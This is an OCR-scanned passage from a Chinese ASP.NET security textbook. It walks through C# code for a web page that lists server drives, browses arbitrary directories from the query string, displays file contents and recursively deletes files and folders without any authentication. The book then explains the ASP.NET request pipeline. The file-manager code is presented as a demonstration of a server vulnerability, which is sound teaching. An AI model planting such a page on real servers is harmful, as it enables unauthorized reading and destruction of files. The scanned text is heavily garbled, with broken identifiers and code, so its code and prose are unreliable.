方法 1: 使 用 GetSysInf0 方 法 得 到 服务 器 的 当前 环境 和 平台 的 信息 。 

代码 如 下 所 示 。 

// 获取 系统 信息 的 方法 ， 此 方法 在 1istdrivers.aspx.cs 文件 中 

public void GetSysInf () 


// 获取 操作 系统 类 型 

qDrives = Environment-OSVersion.ToString() 7 

// 获取 系统 文件 夹 

qsSystemDir = Environment.SystemDirectory.ToString(); 
qMo = (Environment .WorkingSet/1024) .ToString(); 

// 获取 当前 目录 〈 即 该 进程 从 中 启动 的 目录 ) 的 完全 限定 路 径 
qCurDir = Environment.CurrentDirectory.ToString(); 
// 获取 主机 的 网 络 域名 

qDomName = Environment .UserDomainName.ToString(); 
// 获取 系统 启动 后 经 过 的 毫秒 数 

qTick = Environment.TickCount; 


// 计算 得 到 系统 启动 后 经 过 的 分 钟 数 











i 
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qTick /= 60000; 
// 获取 机 器 名 


qMachine = Environment .MachineName; 

// 获取 运行 当前 进程 的 用 户 名 

qUser = Environment .UserName; 

/* 检 索 此 计算 机 上 格式 为 "二 驱动 器 号 > :\" 的 逻辑 驱动 器 的 名 称 , 返回 字符 串 数组 , 这 是 下 一 步 操 
作 的 关键 所 在 */ 

achDrives = Directory.GetLogicalDrives(); 

// 获取 此 字符 串 数组 的 维 数 确定 有 多 少 个 逻辑 驱动 器 

nNumOfDrives = achDrives.Length; 


} 


包 注 意 : 需要 获取 映射 到 进程 上 下 文 的 物理 内 存量 ， 通 过 这 一 内 存 映 射 量 可 以 了 解 
ASP.NET 程序 在 运行 时 需要 多 少 系 统 物 理 内 存 , 有 助 于 更 好 的 规划 整个 应 用 , 物 
理 内 存量 是 以 Byte 为 单位 的 ， 所 以 将 此 数值 除 以 1024， 可 以 得 到 单位 为 KB 的 
物理 内 存量 。 


一 般 来 说 ， 系 统 信息 不 需要 进行 操作 ， 把 它们 用 asp:Label 简单 地 显示 出 来 就 行 了 。 届 
辑 驱 动 器 的 个 数 在 不 同 的 服务 器 上 是 不 定 的 ， 所 以 用 不 定 长 数组 保存 逻辑 驱动 器 的 名 称 ， 
而 且 罗 辑 驱动 器 的 名 称 也 是 下 一 步 浏览 目录 和 文件 的 基础 ， 故 上 面 的 例子 采用 数据 网 格 
DataGrid 来 显示 和 处 理 。 

显示 和 处 理 罗 辑 驱动 器 名 称 的 DataGrid 的 代码 如 下 : 

<asp:DataGrid id="DriversGrid" runat="server" AutoGenerateColumns="false" 

> 

<Columns> 

<asp:BoundColumn HeaderText="ID" DataField="ID" /> 

<asp:BoundColumn HeaderText=" 人 磁 稻 名 " DataField="Drivers" /> 


<asp:HyperLinkColumn 

HeaderText=" 详 细 信 息 " 

DataNavigateUrlField="Drivers" 
DataNavigateUrlFormatString="listdir.aspx?dir={0}" 
DataTextField="Detail" 

Target=" new" /> 

</Columns> 

</asp:DataGrid> 


上 述 例子 中 , 前 两 个 BoundColumn 列 都 是 显示 序号 和 实际 逻辑 驱动 器 名 称 的 , 需要 说 
明 的 是 第 三 列 ， 在 进入 各 个 逻辑 驱动 器 显示 目录 和 文件 之 前 需要 将 所 选择 的 逻辑 驱动 器 的 
名 称 传递 到 显示 目录 的 文件 中 ， 所 以 需要 一 个 特殊 的 超 链接 行 HyperLinkColumn， 将 
DataNavigateUrlField 设置 为 数据 源 中 要 绑 定 到 HyperLinkColumn 中 的 超 链 接 的 URL 字段， 
即 逻 辑 驱 动 器 名 称 。 

然后 ， 将 DataNavigateUrlFormatString 设置 为 当 URL 数据 绑 定 到 数据 源 中 的 字段 时 ， 
此 HyperLinkColumn 中 的 超 链接 的 URL 显示 格式 ， 即 要 链接 到 的 下 一 级 处 理 页 面 ， 在 此 
为 listdir.aspx?dir={ 用 户 点 击 行 的 逻辑 驱动 器 名 称 } 。 


创建 数据 源 的 代码 如 下 : 
// 通过 此 方法 返回 一 个 集合 形式 的 数据 视图 DataView 
ICollection CreateDataSource () { 


// 定义 内 存 中 的 数据 表 DataTable 
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DataTable dt = new DataTable(); 

// 定义 DataTable 中 的 一 行 数据 DataRow 

DataRow dr; 

/* 向 DataTable 中 增加 一 个 列 , 格式 : DataColumn ("Column"， type) 
Column 为 数据 列 的 名 字 , type 为 数据 列 的 数据 类 型 */ 

dt.Columns.Add (new DataColumn ("ID", typeof (Int32))); 
dt.Columns.Add (new DataColumn ("drivers", typeof (string))); 
dt.Columns.Add (new DataColumn ("detail", typeof (string))); 
// 使 用 for 循环 将 逻辑 驱动 器 的 名 称 以 行 的 形式 添加 到 数据 表 DataTable 中 


for (int i = 0; i < nNumOfDrives; i++) 
{ 

// 定义 新 行 

dr = dt.NewRow(); 


// 对 行 中 每 列 进行 赋值 , 注意 要 与 上 边 定义 的 DataTable 的 行 相对 应 


qdr[0] = i; // 循环 生成 的 序号 
dr[1] = achDrives[i] .ToString(); // 逻辑 驱动 器 的 名 称 
dr[2] = "查看 详情 "; 


// 向 DataTable 中 添加 行 

dt.Rows.Add (dr); 

} 

// 根据 得 到 的 DataTable 生成 自 定义 视图 DataView 
DataView dv = new DataView (dt); 

// 返回 得 到 的 视图 DataView 

return dv; 


} 


通过 上 述 方 法 ， 得 到 了 一 个 包含 所 需 数据 的 视图 DataView， 这 时 只 需要 在 此 页 的 


Page_Load 方法 中 将 此 数据 视图 绑 定 到 DataGrid 上 即 可 。 
数据 绑 定 代码 如 下 : 
DriversGrid.DataSource = CreateDataSource(); 


// 将 此 DataGrid 进行 数据 绑 定 


DriversGrid.DataBind() 


通过 上 述 介 绍 的 方法 实现 了 获取 系统 信息 和 显示 所 有 由 辑 驱 动 器 名 称 的 功能 ， 同 时 也 
可 以 通过 相应 的 链接 进入 下 一 个 显示 目录 和 文件 名 的 程序 ， 显 示 该 逻辑 驱动 器 下 的 所 有 目 


录 和 文件 。 
2. 显示 目录 中 所 有 子 目 录 和 文件 的 程序 


一 般 的 文件 目录 下 有 子 目 录 和 文件 两 种 形式 ， 必 须 区 分 对 待 。 调 用 此 程序 本 身 需 要 对 


子 目 录 进 行列 表 显 示 ， 而 文件 则 需要 对 其 属性 和 内 容 进行 显示 。 


并 且 两 者 的 删除 方法 也 不 


相同 ， 所 以 在 这 里 设置 DataGrid， 分 别 用 来 处 理 和 显示 目录 和 文件 。 


显示 目录 或 文件 的 序号 和 名 称 等 数据 列 类 似 于 方法 1， 这 呈 





有 不 再 重复 。 子 目录 和 文件 


分 别 有 各 自 的 处 理 页 面 ， 所 以 需要 导航 到 两 个 不 同 的 页 面 ， 对 于 子 目 录 继 续 使 用 显示 目录 


的 程序 ， 对 其 下 的 子 目录 和 文件 进行 列表 显示 : 


<asp:HyperLinkColumn DataNavigateUrlField="DirName" 
DataNavigateUrlFormatSstring="listdir.aspx?dir={0}" 


DataTextField="DirDetail" 
HeaderText=" 详 细 信 息 " 
Target=" new" 

a 
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对 于 文件 ， 使 用 showfile.aspx 程序 显示 其 属性 和 内 容 : 


<asp:HyperLinkColumn DataNavigateUrlField="FileName" 
DataNavigateUrlFormatString="showfile.aspx?file={0}" 
DataTextField="FileDetail" 

HeaderText=" 详 细 信息 " 

Target=" new" 

一 


在 DataGrid 中 分 别 设置 两 个 HyperLinkColumn 列 导航 到 不 同 的 处 理 页 面 ,其 代码 如 下 : 


<asp:ButtonColumn HeaderText=" 删 除 " 
Text=" 删 除 " 

CommandName="Delete" 

WwW 


由 于 添加 、 更 新 、 删 除 功能 列 都 是 DataGrid 的 默认 模板 列 ， 所 以 可 以 在 VS 2008 中 通 
过 DataGrid 的 属性 生成 器 自动 添加 这 些 功 能 列 。 

在 产生 数据 源 的 方法 中 需要 使 用 由 上 一 个 页 面 传递 过 来 的 参数 确定 目录 和 文件 的 名 
称 ， 所 以 在 页 面 的 Page_Load 方法 里 编写 下 列 代码 : 


strDir2List = Request.QueryString["dir"]; 


字符 串 strDir2List 即 传 过 来 的 目录 名 或 文件 名 。 生 成 目录 数据 网 格 (DirGrid) 数据 源 
的 方法 如 下 : 


ICollection CreateDataSourceDir() { 

dtDir = new DataTable(); 

DataRow dr; 

// 向 DataTable 中 添加 新 的 数据 列 , 共 四 列 

dtDir.Columns.Add (new DataColumn ("DirID", typeof (Int32))); 
dtDir.Columns.Add (new DataColumn ("DirName", typeof (string))); 
dtDir.Columns.Add (new DataColumn ("DelDir", typeof (string))); 
dtDir.Columns.Add (new DataColumn ("DirDetail", typeof (string))); 
// 根据 传 入 的 参数 目录 名 ) 得 到 此 目录 下 所 有 子 目 录 名 的 字符 串 数组 

string [] DirEntries = Directory.GetDirectories(strDir2List); 
// 使 用 foreach 循环 可 以 对 未 知 长 度 的 数组 进行 遍历 循环 

foreach (string DirName in DirEntries){ 

dr = dtDir.NewRow(); 


dr[0] = i; // 序号 
dr[1] = DirName; // 文件 夹 名 称 
dr[3] = "删除 "> 


dr[3] = "查看 详情 "; 

dtDir.Rows.Add (dr); 

入 

1 

DataView dvDir = new DataView (dtDir); 
// 返回 得 到 的 数据 视图 

return dvDir; 


生成 文件 数据 网 格 (FileGrid) 数据 源 的 方法 : 
// 通过 此 方法 返回 一 个 集合 形式 的 数据 视图 DataView, 用 来 初始 化 文件 的 DataGrid 


ICollection CreateDataSourceFile() 


和 
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dtFile = new DataTable(); 

DataRow dr; 

dtFile.Columns.Add (new DataColumn ("FileID", typeof (Int32))); 
dtFile.Columns.Add (new DataColumn ("FileName", typeof (string))); 
dtFile.Columns.Add (new DataColumn ("DelFile", typeof (string) ) ) > 
dtFile.Columns.Add (new DataColumn ("FileDetail", typeof (string))); 
// 根据 传 入 的 参数 (目录 名 ) 得 到 此 目录 下 所 有 文件 名 的 字符 串 数组 

string [] FileEntries = Directory.GetFiles(strDir2List); 

foreach (string FileName in FileEntries){ 

dr = dtFile.NewRow(); 


dr[0] = i; 

dr[1] = FileName; 
dr[2] =“" 删 除 "; 
dr[3] = "查看 详情 "; 
dtFile.Rows.Add (dr); 
二 


; 
dvFile = new DataView (dtFile); 
return dvFile; 


: 

上 面 例子 中 通过 代码 实现 了 对 某 个 逻辑 驱动 器 或 目录 中 的 所 有 子 目 录 和 文件 进行 列 
表 显 示 ， 并 且 可 以 根据 显示 结果 更 进一步 的 浏览 子 日 录 或 查看 文件 的 属性 和 内 容 提要 。 浏 
览 子 目 录 没有 目录 级 别 要 求 ， 没 有 目录 深度 限制 。 

在 删除 子 目 录 时 需要 用 到 Directory.Delete(string,bool) 方 法 ， 此 方法 有 两 种 方式 : 

口 从 指定 路 径 删 除 空 目 录 ， 代 码 如 下 : 


public static void Delete (string) 


口 删除 指定 的 目录 并 (如 果 指 示 ) 删 除 该 目录 中 的 任何 子 目录 , 将 boolean 设置 为 true， 
则 删除 此 目录 下 的 所 有 子 目 录 和 文件 ， 和 否则 将 boolean 设置 为 false。 


public static void Delete(string, boolean); 
这 里 使 用 了 第 2 种 方法 ， 如 果 选 择 删除 的 话 ， 将 删除 此 目录 下 的 所 有 子 目 录 和 文件 。 


全 注意 ; Directory 类 的 所 有 方法 都 是 静态 的 ， 无 需 具 有 目录 Directory 的 实例 就 可 以 调用 。 
实现 删除 子 目录 的 方法 为 VS.NET 自动 添加 ，DataGridCommandEventArgse 为 
DirGrid 中 CommandName="Delete" 的 ButtonColumn 的 事件 ， 通 过 此 事件 可 以 得 
到 ButtonColumn 按钮 列 被 单 击 的 次 数 ， 进 而 确定 需要 删除 的 子 目 录 的 名 称 。 


删除 文件 目录 代码 如 下 : 

private void DirGrid DeleteCommand (object source, 
System.Web.UI.WebControls.DataGridCommandEventArgs e){ 

/* 定 义 一 个 单元 格 ,e.Item 为 此 事件 所 发 生 行 的 所 有 项 目 ,e .Item.Cells [1] 为 整个 行 的 第 二 个 

单元 格 的 内 容 , 在 此 DataGrid 中 为 子 目 录 的 名 称 

*/ 





TableCell ItemCell = e.Item.Cells[1]; 
// 得 到 此 子 目录 的 名 称 的 字符 串 
string item = ItemCell.Text; 


// 删除 此 子 目 录 


Directory.Delete (item, true); 


// 删除 后 进行 数据 绑 定 以 更 新 数据 列表 


DirGrid.DataBind(); 


A 
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在 删除 文件 时 需要 用 到 方法 File.Delete(string path)， 和 Directory 类 一 样 ，File 类 的 所 





有 方法 都 是 静态 的 ， 因 














而 无 须 具有 目录 的 实例 就 可 调用 。 删 除 文件 事件 代码 如 下 : 


private void FileGrid DeleteCommand (object source, 
System.Web.UI.WebControls.DataGridCommandEventArgs e) { 
TableCell ItemCell = e.Item.Cells[1]; 

// 得 到 此 文件 名 称 的 字符 串 


st ring item = ItemCell.Text; 


// 删除 此 文件 


File.Delete (item); 
// 删除 后 进行 数据 绑 定 以 更 新 数据 列表 
DirGrid.DataBind(); 


} 


上 述 代 码 实 现 了 删除 某 一 个 子 目录 或 者 文件 的 功能 ， 此 功能 在 测试 时 需要 慎重 使 用 ， 
一 旦 删除 无 法 通过 常规 方法 恢复 。 其 他 如 目录 或 文件 改名 、 修 改 内 容 等 方法 都 可 以 在 此 程 
序 基 础 上 添加 ， 实 现 方法 也 很 简单 。 

读者 可 以 通过 添加 相应 功能 , 将 其 扩充 为 一 个 基于 Web 的 服务 器 文件 管理 系统 。 我 们 


也 可 以 由 此 看 到 这 个 程 


序 的 危害 性 ， 一 个 没有 对 此 安全 隐患 采取 防范 措施 的 服务 器 文件 系 


统 就 都 暴露 在 了 使 用 此 程序 的 用 户 面前 。 
3. 显示 文件 属性 和 内 容 的 程序 


在 显示 属性 和 内 容 时 需要 用 到 的 两 个 主要 的 类 分 别 如 下 : 

口 System.IO.FileInfo: 提供 创建 、 复 制 、 删 除 、 移 动 和 打开 文件 的 实例 方法 ， 并 且 帮 
助 创建 FileStream 对 象 。 

口 System.IO.StreamReader: 实现 一 个 TextReader， 使 其 以 一 种 特定 的 编码 从 字 节 流 
中 读 取 字 符 。 除 非 另外 指定 ，StreamReader 的 默认 编码 为 UTF-8， 而 不 是 当前 系 
统 的 ANSI 代码 页 。 UTF-8 可 以 正确 处 理 Unicode 字符 并 在 操作 系统 的 本 地 化 版 本 
上 提供 一 致 的 结果 。 

显示 页 面 的 主要 代码 如 下 : 


<asp:Label id="FileDetail" runat="server"/> 


// 接收 传 入 的 参数 ， 


确定 需要 操作 的 文件 名 称 


strFile2Show = Request.QueryString["file"]; 
// 根据 文件 名 实例 化 一 个 FileInfo 对 象 
FileInfo fi = new FileInfo(strFile2Show) 


FileDetail.Text 
FileDetail.Text 
FileDetail.Text 


// 获得 文件 的 大 小 ， 


FileDetail.Text 
FileDetail.Text 


= "文件 名 : "; 

+= strFile2Showt+"<br>"; 

+= "文件 大 小 "; 

然后 变换 单位 为 KB 

+= (fi.Length/1024) .ToString()+"K<br>"; 
+= "创建 文件 时 间 : "; 


// 获得 文件 的 创建 日 期 


FileDetail.Text 
FileDetail.Text 


+= fi.CreationTime.ToString(); 


+= "上 次 访问 时 间 : "; 


// 获得 文件 的 上 次 访问 日 期 


FileDetail.Text 
FileDetail.Text 


Ss 


+= fi.LastAccessTime.ToString()+"<br>"; 
+= "上 次 写 入 时 间 : "; 
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// 获 得 文件 的 上 次 写 入 日 期 

FileDetail.Text += fi.LastWriteTime.ToString()+"<br>"; 

// 实例 化 一 个 StreamReader 对 象 ,用 于 读 取 此 FileInfo 的 内 容 

StreamReader FileReader = fi.OpenText (); 

// 定义 一 个 长 度 为 1000 的 字符 数组 作为 缓冲 区 

char[] theBuffer = new char[1000]; 

ReadBlock 方法 : 从 当前 流 中 读 取 最 大 数量 的 字符 并 从 索引 开始 将 该 数据 写 入 组 
冲 区 。 

参数 : 

char[] buffer: 方法 返回 时 ， 包 含 指定 的 字符 数组 。 

int index: buffer 中 开始 写 入 的 位 置 。 

int count: 最 多 读 取 的 字符 数 。 


int nRead = FileReader.ReadBlock (theBuffer, 0,1000); 
FileDetail.Text += new String (theBuffer,0,nRead); 
// 关闭 此 StreamReader 并 释放 与 之 关联 的 所 有 系统 资源 


FileReader.Close(); 

实例 演示 了 一 个 简单 的 Web 页 面 的 服务 器 磁盘 管理 应 用 程序 ,可 以 查看 、 删除 目录 和 
文件 。 如 果 需 要 修改 、 新 建文 件 和 文件 夹 等 功能 ， 只 需 添加 上 相应 的 代码 就 可 以 。 这 里 内 
是 通过 这 个 程序 说 明 服务 器 中 存在 的 安全 隐患。 

通过 这 3 个 简单 程序 , 应 该 能 够 清楚 的 认识 到 这 一 漏洞 的 危害 性 , 如 果 不 加 防范 的 话 ， 
黑客 的 程序 就 能 恶意 调用 这 些 托 管 组 件 查看 、 删 除 服务 器 的 系统 日 志 、 系 统 文件 。 
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任何 成 功 的 应 用 程序 安全 策略 都 是 以 稳固 的 身份 验证 和 授权 手段 为 基础 的 ， 当 然 ， 用 
来 保证 数据 的 保密 性 和 完整 性 的 安全 通信 也 必 不 可 少 。 

身份 验证 authentication) 是 一 个 标识 应 用 程序 客户 端的 过 程 ， 这 里 的 客户 端 可 能 是 
终端 用 户 、 服 务 , 也 可 能 是 进程 或 计算 机 , 通过 了 身份 验证 的 客户 端 被 称 为 主体 (principal) 。 
身份 验证 可 以 跨越 应 用 程序 的 多 层 进行 。 终 端 用 户 起 初 由 Web 应 用 程序 根据 用 户 名 和 密码 
进行 身份 验证 ， 随 后 终端 用 户 的 请 求 由 中 间 层 应 用 程序 服务 器 和 数据 库 服务 器 进行 处 理 ， 
此 过 程 中 也 将 进行 身份 验证 ， 以 便 验 证 并 处 理 终端 用 户 的 请 求 。 





8.1 ASPNET 安全 管道 


在 讲解 如 何 利用 管道 技术 防范 攻击 前 ， 读 者 需要 先 了 解 有 关 管 道 技术 的 两 个 定义 : 请 


求 管道 和 处 理 程序 。 


1. 请 求 管道 





当 一 个 请 求 需要 访问 某 个 站 点 的 时 候 ，IS 接收 请 求 并 将 根据 IS 设置 将 扩展 名 映射 到 


ISAPI 筛选 器 。 例 如 ，ASP.NET 2.0 的 页 
面 .aspx、.asmx、asd 及 其 他 扩展 名 都 会 被 
映射 到 专用 ISAPI 筛选 器 aspnet_isapi.dll。 
筛选 器 将 启动 ASPNET (CRL) 运行 库 。 

请 求 在 ASPNET 运行 库 的 HTTP 
Application 对 象 上 启动 。 HTTPApplication 
对 象 将 请 求 传 递 给 一 个 或 多 个 
HTTPModule 实例 进行 会 话 维护 、 验 证 或 
配置 文件 维护 。 如 果 请 求 是 动词 和 路 径 则 
将 请 求 传递 给 HITPHandler 处 理 。 

请 求 管道 的 处 理 模 式 和 流程 如 图 8-1 
所 示 。 


2. 处 理 程序 


ASP.NET 2.0 以 上 版 本 中 的 处 理 程序 
添加 了 新 的 内 容 ， 如 可 以 支持 应 用 程序 配 
置 工具 和 其 他 新 功能 的 处 理 程序 。 这 些 处 
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图 8-1 请 求 管道 
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理 程序 将 允许 开发 人 员 配 置 ASP.NET 用 户 和 其 他 设备 管理 工具 。 这 些 处 理 程序 和 功能 如 
表 8-1 所 示 。 


表 8-1 主要 的 处 理 程序 








管理 处 理 程序 








WebAdminHandler 管理 Web 站 点 主页 ， 该 处 理 程序 可 以 管理 ASP.NET 2.0 Web 应 用 程序 
TraceHandler 跟踪 处 理 信息 程序 
WebResourcesHandler WebResourcesHandler 可 以 将 Web 资源 配置 为 后 部 署 








支持 缓存 图 形 组 件 信息 处 理 
使 用 PrecompHandler 可 以 对 ASP.NET 应 用 程序 中 的 所 有 .aspx 页 面 进行 
批 编译 

WebPartExportHandler 支持 存储 和 传输 Web 部 件 布局 信息 

禁止 指定 类 型 的 文件 被 访问 ， 如 母 版 页 、 外 观 文件 及 其 他 代码 文件 








CachedImageServiceHandler 


PrecompHandler 





WebPartExportHandler 
HTTPForbiddenHandler 




















8.1.1 HTTP 请 求 处 理 流程 


请 读者 回想 “为 什么 在 地 址 栏 输入 aspnet.spaces.live.com 就 可 以 看 到 杨 云 的 个 人 空 
间 ? ”， 对 于 普通 访问 者 来 说 ， 这 就 像 每 天 太阳 东边 升 起 西边 落下 一 样 是 理所当然 的 。 对 
于 很 多 程序 员 来 说 ， 认 为 这 个 与 己 无 关 ， 不 过 是 系统 管理 员 或 网 管 员 的 责任 ， 毕 竟 IIS 是 
Windows 的 一 个 组 件 ， 又 不 是 ASPNET 的 一 个 组 成 部 分 。 

而 实际 上 ， 从 用 户 输入 Enter 键 到 页 面 呈现 在 他 们 眼前 的 十 分 之 一 秒 内 ，IS 和 .NET 
框架 已 经 做 了 大 量 的 幕后 工作 。 

读者 可 能 觉得 了 解 这 些 幕 后 工作 是 如 何 运 作 的 无 关 紧 要 ， 只 要 保证 开发 出 的 程序 可 以 
高 效 地 运行 就 可 以 了 。 然 而 在 开发 过 程 中 ， 开 发 人 员 却 发 现 常 常 需要 使 用 诸如 HttpContext 
这 样 的 类 。 这 个 时 候 ， 可 曾 思 考 过 这 些 类 的 构成 和 类 的 实体 是 如 何 创 建 的 ? 有 些 人 可 能 和 
单 地 回答 : HttpContext 代表 当前 请 求 的 一 个 上 下 文 环 境 。 但 IS、Framework、ASP.NET 
是 如 何 协同 工作 处 理 每 个 HTTP 请 求 ? 如 何 区 分 不 同 的 请 求 ? IS、Framework、ASP.NET 
三 者 之 间 的 数据 如 何 流动 的 呢 ? 
回答 上 面 这 些 问 题 , 首先 需要 了 解 IS 是 如 何 处 理 页 面 请 求 的 , 这 也 是 理解 表单 (form) 
验证 模式 和 Windows 验证 模式 的 基础 。 

当 服 务 器 接收 到 一 个 HTTP 请 求 的 时 候 ，IIS 首先 需要 如 何 处 理 这 个 请 求 〈 服 务 器 处 
理 .htm 页 面 和 .aspx 页 面 方式 不 同 ) 。 那 IS 依据 什么 去 处 理 呢 ? 答案 是 文件 的 后 缀 名 。 

服务 器 获取 所 请 求 页 面 (也 可 以 是 文件 ， 如 jimmy:jpg) 的 后 级 名 以 后 , 会 在 服务 器 端 
寻找 可 以 处 理 这 类 后 级 名 的 应 用 程序 ， 如 果 IIS 找 不 到 可 以 处 理 此 类 文件 的 应 用 程序 ， 并 
且 这 个 文件 也 没有 受到 服务 器 端的 保护 〈 一 个 受 保护 的 例子 就 如 App_Code 中 的 文件 ， 一 
个 不 受 保护 的 例子 就 是 js 脚本 ) ， 那 么 IIS 将 直接 把 这 个 文件 返还 给 客户 端 。 

通常 互联 网 服务 器 应 用 程序 接口 (Interet Server Application Programe Interface, ISAPI) 
能 够 处 理 各 种 后 级 名 的 应 用 程序 。ISAPI 的 作用 是 代理 ， 它 的 工作 是 映射 请 求 的 页 面 ( 文 
件 ) 和 与 此 后 缀 名 相对 应 的 实际 处 理 程序 。 

ASP.NET 是 由 一 系列 将 HTTP 请 求 转变 为 对 客户 端的 响应 的 类 组 成 的 。HttpRuntime 
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类 是 ASPNET 的 一 个 主要 入 口 ， 它 有 一 个 称 做 ProcessRequest 的 方法 ， 这 个 方法 以 
HttpWorkerRequest 类 作为 参数 。HttpRuntime 类 包含 着 几乎 所 有 关于 单个 HTTP 请求 的 信 
息 : 请 求 的 文件 、 服 务 器 端 变量 、QueryString、HTTP 头 信息 等 。ASPNET 使 用 这 些 信 息 
来 加 载 、 运 行 正 确 的 文件 ， 并 且 将 这 个 请 求 转换 到 输出 流 中 ， 一 般 是 HTML 页 面 。 

当 web.config 文件 的 内 容 发 生 改 变 或 .aspx 文件 发 生变 动 的 时 候 , 为 了 能 够 卸载 运行 在 
同一 个 进程 中 的 应 用 程序 ，HTTP 请 求 被 分 放 在 相互 隔离 的 应 用 程序 域 中 。 

IIS 依赖 HTTP.SYS 内 置 驱动 程序 来 监听 来 自 外 部 的 HTTP 请 求 。 在 操作 系统 启动 的 
时 候 ，IIS 首先 在 HTTP.SYS 中 注册 自己 的 虚拟 路 径 。 也 就 是 告诉 HTTP.SYS， 哪 些 URL 
是 可 以 访问 的 ， 哪 些 是 不 可 以 访问 的 。 举 个 简单 的 例子 : 访问 不 存在 的 文件 出 现 的 404 错 
误 就 是 在 这 一 步 发 生 的 。 

如 果 请 求 的 是 一 个 可 访问 的 URL，HTTP.SYS 会 将 这 个 请 求 交 给 IIS 工作 者 进程 。 每 
个 工作 者 进程 都 有 一 个 身份 标识 以 及 一 系列 的 可 选 性 能 参数 。 

除了 映射 文件 与 其 对 应 的 处 理 程序 以 外 ，ISAPI 还 需要 做 一 些 其 他 的 工作 : 

(1) 从 HTTP.SYS 中 获取 的 HTTP 请 求 信息 ， 并 且 将 这 些 信息 保存 到 HttpWorker- 
Request 类 中 。 

(2) 在 相互 隔离 的 应 用 程序 域 AppDomain 中 加 载 HttpRuntime。 

(3) 调用 HttpRuntime 的 ProcessRequest 方法 。 

接 下 来 ， 通 常 编写 的 代码 ，IIS 接收 返回 的 数据 流 ， 并 重新 返还 给 HTTP.SYS， 最 后 
HTTP.SYS 将 这 些 数据 返回 给 客户 端 浏览 器 。 

安全 HTTP 请 求 的 流程 如 图 8-2 所 示 。 











Ww3wq.exe(/Page1.aspx) W3wq.exe(Page2.aspx) 
工作 者 进程 身份 标识 工作 者 进程 身份 标识 


CLR/HttpRuntime 


Http 200 OK Http 请 求 : Page1.aspx/page2.aspx 











图 8-2 ASPNET 的 宿主 环境 


8.1.2 安全 HTTP 管道 


前 面 讨论 了 从 发 出 HTTP 请 求 到 看 到 浏览 器 输出 这 转瞬 即 逝 的 十 分 之 一 秒 内 IS 和 框 
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架 所 做 的 工作 。 本 小 节 讨 论 的 是 程序 员 编 写 的 代码 是 如 何在 这 一 过 程 中 进行 衔接 的 。 
当 HTTP 请 求 进入 ASP.NET Runtime 的 管道 由 托管 模块 和 处 理 器 组 成 ， 当 一 个 HTTP 
请 求 进入 时 ， 由 管道 来 处 理 请 求 。 
结合 如 图 8-3 所 示 的 编号 ， 看 数据 是 如 何 流动 的 。 
来 自 宿 主 环境 的 HTTP 请 求 








应 用 程序 域 (AppDomain) 


IHttpModule 





图 8-3 Http 管道 


(1) HttpRuntime 将 HTTP 请 求 转交 给 HttpApplication，HttpApplication 代表 程序 员 创 
建 的 Web 应 用 程序 。HttpApplication 创建 针对 此 HTTP 请 求 的 HttpContext 对 象 ， 这 些 对 
象 包含 了 关于 此 请 求 的 诸多 其 他 对 象 , 主要 是 HttpRequest、 HttpResponse、HttpSessionState 
等 。 这 些 对 象 在 程序 中 通过 Page 类 或 者 Context 类 进行 访问 。 

(2) HTTP 请 求 通过 一 些 Module 执行 某 个 实际 工作 的 前 置 操作 。 

(3) 执行 实际 操作 ， 也 就 是 .aspx 页 面 所 完成 的 业务 逻辑 。 

(4) HTTP 请 求 返回 到 Module， 此 时 Module 可 以 做 一 些 后 置 工作 。 

HTTP 管道 程序 在 工作 进程 中 处 理 request 请 求 。 默 认 情况 下 ， 某 一 时 刻 仅 能 有 一 个 工 
作 进 程 (如果 Web 服务 器 有 多 个 CPU， 可 以 配置 管道 程序 使 用 多 个 工作 进程 ) ， 这 是 一 
个 在 本 地 IS 上 很 重要 的 一 个 改变 ， 它 使 用 不 同 的 工作 进程 隔离 不 同 的 Application 程序 。 
同时 ， 管 道 程序 的 各 个 工作 进程 也 完全 地 被 AppDomain 所 隔离 ， 可 以 将 AppDomain 看 作 
是 进程 中 的 一 个 子 进 程 。 管道 程序 向 一 个 AppDomain 中 的 所 有 虚拟 目录 发 送 HTTP request 
请 求 。 换 句 话 说， 每 一 个 虚拟 目录 被 作为 一 个 单独 的 应 用 程序 来 对 待 。 本 地 IIS 另 一 个 值 
得 注意 的 改变 就 是 允许 多 个 虚拟 目录 成 为 同一 个 Application 的 组 成 部 分 。 

ASP.NET 支持 多 标准 的 循环 工作 进程 ,这些 标准 包括 空闲 时 间 requests serviced 数量 、 
requests 队列 的 数量 和 物理 内 存 的 耗费 量 。 全 局 .NET 配置 文件 和 machine 配置 文件 初始 化 
这 些 数值 。 当 一 个 aspnet_wp.exe 的 实例 通过 入 口 ，aspnet isapi.dll 会 运行 一 个 新 的 工作 进 
程 并 发 送 request 请 求 。 旧 的 进程 在 处 理 完 request 请 求 后 会 自动 终止 。 循 环 工作 进程 会 
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提升 进程 可 靠 性 ， 在 危险 进程 耗 尽 资源 之 前 杀 死 它们 。 

在 实际 编写 代码 时 HITP Handlers 类 的 作用 至 关 重要 ， 它 是 一 个 继承 自 IHttpHandler 
接口 的 简单 类 ， 以 下 是 该 类 的 定义 代码 : 

interface IHttpHandler 

! 


// 调用 响应 

void ProcessRequest (HttpContext ctx); 
// 调用 监控 

bool IsReuseable { get; } 

]: 





HttpApplicaiton 对 象 调用 ProcessRequest 方法 ， 通 过 handler 处 理 当 前 的 HTTP 请 求 ， 
产生 response 响应 。 在 此 期 间 ， 需 要 访问 IsSReuseable 属性 ， 测 定 hanlder 是 否 可 被 使 用 。 

下 面 的 演示 范例 将 告诉 读者 如 何 创 建 一 个 简单 的 可 重用 的 HTTP 句柄 ， 它 可 以 响应 所 
有 的 request 请 求 并 把 当前 时 间 返 回 到 XML 标记 中 。 当 然 ， 也 可 以 使 用 HttpContext 对 象 
的 response 属性 ， 设 置 其 中 的 MIME 属性 输出 内 容 。 

简单 应 答 管道 代码 如 下 : 


using System7 
using System.Web; 





namespace Pipeline 


public class TimeHandler : IHttpHandler 
{ 


void ProcessRequest (HttpContext ctx) 
{ 
ctx.Response.ContentType = "text/xml"; 
ctx.Response.Write ("<now>"); 
ctx.Response.Writel( 
DateTime.Now.ToString()); 
ctx.Response.Write ("</now>"); 
} 
bool IsReuseable { get { return true; } } 
} 
} 


配置 HTTP handler 类 后 才能 实现 它 。 配 置 共 分 为 三 个 阶段 : 

(1) 将 编译 好 的 代码 放 到 ASP.NET 工作 进程 能 够 找到 的 地 方 ,一 般 地 ,已 编译 好 的 .NET 
文件 (dll 文件 ) 应 该 位 于 Web 服务 器 的 虚拟 目录 的 bin 文件 夹 或 位 于 全 局 编译 缓存 
中 (GAC) 。 

(2) 在 HITP request 请 求 到 达 时 ， 让 HTTP 的 管道 程序 执行 自 定义 代码 。 可 以 通过 在 
